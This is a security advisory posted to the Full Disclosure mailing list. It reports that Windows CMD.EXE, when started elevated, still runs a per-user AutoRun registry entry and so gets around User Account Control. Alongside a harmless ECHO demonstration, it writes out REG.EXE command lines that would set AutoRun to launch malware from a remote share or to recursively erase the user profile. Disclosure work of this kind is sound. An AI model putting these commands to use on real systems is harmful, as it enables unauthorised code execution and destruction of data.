[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0826872FA5C64E9D8C438A3407B7CC9B@H270>
Date: Wed, 3 Jun 2020 15:40:19 +0200
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] Defense in depth -- the Microsoft way (part 68): qUACkery is
futile!
Hi @ll,
the help text displayed by the command line "%COMSPEC% /?" as well as the
documentation <https://msdn.microsoft.com/en-us/library/cc771320.aspx> of
Windows' command processor CMD.EXE both state:
| * Executing registry subkeys
|
| If you do not specify /d in String, Cmd.exe looks for the following
| registry subkeys:
|
| HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun\REG_SZ
|
| HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun\REG_EXPAND_SZ
|
| If one or both registry subkeys are present, they are executed before
| all other variables.
|
| ^
| /!\ Warning
| ¯¯¯
| Incorrectly editing the registry may severely damage your system.
Especially this last remark is NOT correct, at least but incomplete:
correctly editing the registry may severely damage your system too!
Demonstration:
~~~~~~~~~~~~~~
0. Log on to the "protected" administrator account created during the
installation of Windows.
1. Run the following command line to add the AutoRun registry entry:
REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ /D "ECHO HKEY_CURRENT_USER" /F
2. Start the command processor C:\Windows\System32\cmd.exe per double-
click or via command line %COMSPEC%: it prints the line
| HKEY_CURRENT_USER
3. Start Windows^WFile Explorer, open the "System" directory, right-
click on C:\Windows\System32\cmd.exe to display its context menu,
then click on the "Run as administrator" entry and acknowledge the
UAC prompt: again it prints the line
| HKEY_CURRENT_USER
OUCH: although running elevated now, the command processor eveluates
a registry entry written by an unprivileged user, thereby
bypassing the "wonderful" but completely futile security theatre
known as user account control!
JFTR: of course nobody uses the "protected" administrator account
created during Windows setup for their everyday work, and also
nobody will EVER start an elevated command prompt there?!
Now just consider to run one of the following command lines and imagine
what damage their execution may spark:
REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ "\\server\share\malware.exe" /F
REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ "ERASE /F /Q /S ""%USERPROFILE%""" /F
stay tuned, and far away from "protected" accounts and split tokens!
Stefan Kanthak
PS: compare this misbehaviour of the command processor to that of COM, as
documented in <https://msdn.microsoft.com/en-us/library/bb756926.aspx>:
| Beginning with Windows Vista® and Windows Server® 2008, if the integrity
| level of a process is higher than Medium, the COM runtime ignores per-
| user COM configuration and accesses only per-machine COM configuration.
| This action reduces the surface area for elevation of privilege attacks,
| preventing a process with standard user privileges from configuring a
| COM object with arbitrary code and having this code called from an
| elevated process.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists